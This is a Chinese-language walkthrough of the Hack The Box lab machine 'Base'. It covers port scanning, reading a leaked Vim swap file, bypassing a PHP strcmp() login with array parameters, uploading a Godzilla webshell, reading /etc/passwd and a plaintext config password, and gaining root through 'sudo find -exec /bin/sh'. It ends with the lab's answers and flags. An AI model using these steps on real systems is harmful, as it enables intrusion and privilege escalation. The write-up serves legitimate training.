目录

连接至HTB服务器并启动靶机

1.Which two TCP ports are open on the remote host?

2.What is the relative path on the webserver for the login page?

3.How many files are present in the '/login' directory?

4.What is the file extension of a swap file?

5.Which PHP function is being used in the backend code to compare the user submitted username and password to the valid username and password?

6.In which directory are the uploaded files stored?

使用Yakit对登录页面进行抓包

7.Which user exists on the remote host with a home directory?

8.What is the password for the user present on the system?

9.What is the full path to the command that the user john can run as user root on the remote host?

尝试使用john账户以及密码对靶机进行SSH服务登录

10.What action can the find command use to execute commands?

Submit user flag

​编辑USER_FLAG：f54846c258f3b4612f78a819573d158e

Submit root flag

ROOT_FLAG：51709519ea18ab37dd6fc58096bea949

---

连接至HTB服务器并启动靶机

靶机IP：10.129.2.131

分配IP：10.10.16.12

---

1.Which two TCP ports are open on the remote host?

使用fscan对靶机进行端口扫描：

fscan -nopoc -nobr -no -h {TARGET_IP}

由fscan扫描结果可见，靶机开启了：22,80 共2个端口

---

2.What is the relative path on the webserver for the login page?

使用浏览器访问靶机URL，可在左上角看到Login按钮：

点击进入后，即可获得登录页面在服务器上的相对地址：/login/login.php

---

3.How many files are present in the '/login' directory?

直接使用浏览器访问/login目录：

可见该目录下有文件：config.php、login.php、login.php.swp，共3个文件

---

4.What is the file extension of a swap file?

在/login目录下，存在一个交换文件：

交换文件的后缀为：.swp

---

5.Which PHP function is being used in the backend code to compare the user submitted username and password to the valid username and password?

点击login.php.swp即可将该文件下载到本地，使用strings按格式查看该文件内容：

strings login.php.swp

b0VIM 8.0
root
base
/var/www/html/login/login.php
3210
#"!
                  <input type="text" name="username" class="form-control" style="max-width: 30%;" id="username" placeholder="Your Username" required>
                <div class="form-group">
              <div class="row" align="center">
            <form id="login-form" action="" method="POST" role="form" style="background-color:#f8fbfe">
          <div class="col-lg-12 mt-5 mt-lg-0">
        <div class="row mt-2">
        </div>
          <p>Use the form below to log into your account.</p>
          <h2>Login</h2>
        <div class="section-title mt-5" >
      <div class="container" data-aos="fade-up">
    <section id="login" class="contact section-bg" style="padding: 160px 0">
    <!-- ======= Login Section ======= -->
  </header><!-- End Header -->
    </div>
      </nav><!-- .navbar -->
        <i class="bi bi-list mobile-nav-toggle"></i>
        </ul>
          <li><a class="nav-link scrollto action" href="/login.php">Login</a></li>
          <li><a class="nav-link scrollto" href="/#contact">Contact</a></li>
          <li><a class="nav-link scrollto" href="/#pricing">Pricing</a></li>
          <li><a class="nav-link scrollto" href="/#team">Team</a></li>
          <li><a class="nav-link scrollto" href="/#services">Services</a></li>
          <li><a class="nav-link scrollto" href="/#about">About</a></li>
          <li><a class="nav-link scrollto" href="/#hero">Home</a></li>
        <ul>
      <nav id="navbar" class="navbar">
      <!-- <a href="index.html" class="logo"><img src="../assets/img/logo.png" alt="" class="img-fluid"></a>-->
      <!-- Uncomment below if you prefer to use an image logo -->
      <h1 class="logo"><a href="index.html">BASE</a></h1>
    <div class="container d-flex align-items-center justify-content-between">
  <header id="header" class="fixed-top">
  <!-- ======= Header ======= -->
<body>
</head>
  <link href="../assets/css/style.css" rel="stylesheet">
  <!-- Template Main CSS File -->
  <link href="../assets/vendor/swiper/swiper-bundle.min.css" rel="stylesheet">
  <link href="../assets/vendor/remixicon/remixicon.css" rel="stylesheet">
  <link href="../assets/vendor/glightbox/css/glightbox.min.css" rel="stylesheet">
  <link href="../assets/vendor/boxicons/css/boxicons.min.css" rel="stylesheet">
  <link href="../assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
  <link href="../assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
  <link href="../assets/vendor/aos/aos.css" rel="stylesheet">
  <!-- Vendor CSS Files -->
  <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i|Raleway:300,300i,400,400i,500,500i,600,600i,700,700i|Poppins:300,300i,400,400i,500,500i,600,600i,700,700i" rel="stylesheet">
  <!-- Google Fonts -->
  <link href="../assets/img/apple-touch-icon.png" rel="apple-touch-icon">
  <link href="../assets/img/favicon.png" rel="icon">
  <!-- Favicons -->
  <meta content="" name="keywords">
  <meta content="" name="description">
  <title>Welcome to Base</title>
  <meta content="width=device-width, initial-scale=1.0" name="viewport">
  <meta charset="utf-8">
<head>
<html lang="en">
<!DOCTYPE html>
    }
        print("<script>alert('Wrong Username or Password')</script>");
    } else {
        }
            print("<script>alert('Wrong Username or Password')</script>");
        } else {
            header("Location: /upload.php");
            $_SESSION['user_id'] = 1;
        if (strcmp($password, $_POST['password']) == 0) {
    if (strcmp($username, $_POST['username']) == 0) {
    require('config.php');
if (!empty($_POST['username']) && !empty($_POST['password'])) {
session_start();
<?php
</html>
</body>
  <script src="../assets/js/main.js"></script>

在代码的末尾部分，可见login.php使用的是strcmp()函数对字符串进行比较：

---

6.In which directory are the uploaded files stored?

通过代码审计，可以看到在账户、密码对比处：

使用的是简单的strcmp()函数进行对比，而且在结尾的判断等于用的是双等号而非三等号

那只需要在POST提交时将username、password这两个变量改成数组形式即可绕过验证

使用Yakit对登录页面进行抓包

修改请求包中的数据：

点击提交数据后，浏览器处就进入了文件上传页面：

对靶机进行目录扫描，查找文件上传后所在的目录：

gobuster dir --url http://{TARGET_IP}/ --wordlist big.txt

尝试访问/_uploaded目录，可以正常访问：

制作一个php文件上传，测试该路径是否为真实文件上传路径

<?php phpinfo(); ?>

将文件命名为test.php后，上传后点击刷新，文件已经出现在了目录中：

对test.php文件进行直接访问，发现文件可以被成功解析：

---

7.Which user exists on the remote host with a home directory?

使用哥斯拉生成一个Webshell：

将shell.php文件进行上传：

使用哥斯拉对shell.php进行连接：

进入哥斯拉的命令执行模块，查看/etc/passwd文件内容：

cat /etc/passwd

再查看目录权限：

ls -ld /home/john

可以看到john用户拥有主目录权限

---

8.What is the password for the user present on the system?

再查看config.php文件内容：

cat /var/www/html/login/config.php

账户：admin

密码：thisisagoodpassword

---

9.What is the full path to the command that the user john can run as user root on the remote host?

虽然上面config.php文件中显示的账户密码对应的是admin用户

但是考虑到主目录权限用户是john，所以这里的admin很可能和john是同一个人

尝试使用john账户以及密码对靶机进行SSH服务登录

ssh john@{TARGET_IP}

查看john用户可以使用sudo执行的命令：

sudo -l

通过结果可知，find命令允许我们sudo执行(root身份)，完整路径：/usr/bin/find

---

10.What action can the find command use to execute commands?

推荐一个网站，这里可以找到二进制命令突破环境限制getshell的命令

网站地址：https://gtfobins.github.io

find命令可以使用exec来执行操作命令：

sudo find . -exec /bin/sh \; -quit

---

Submit user flag

通过john用户权限查找一下user.txt文件：

find / -name 'user.txt' 2>/dev/null

查看user.txt文件内容：

cat /home/john/user.txt

USER_FLAG：f54846c258f3b4612f78a819573d158e

---

Submit root flag

通过sudo执行find命令获取root权限：

sudo find . -exec /bin/sh \; -quit

查找一下root.txt文件位置：

find / -name 'root.txt' 2>/dev/null

查看root.txt文件内容：

cat /root/root.txt

ROOT_FLAG：51709519ea18ab37dd6fc58096bea949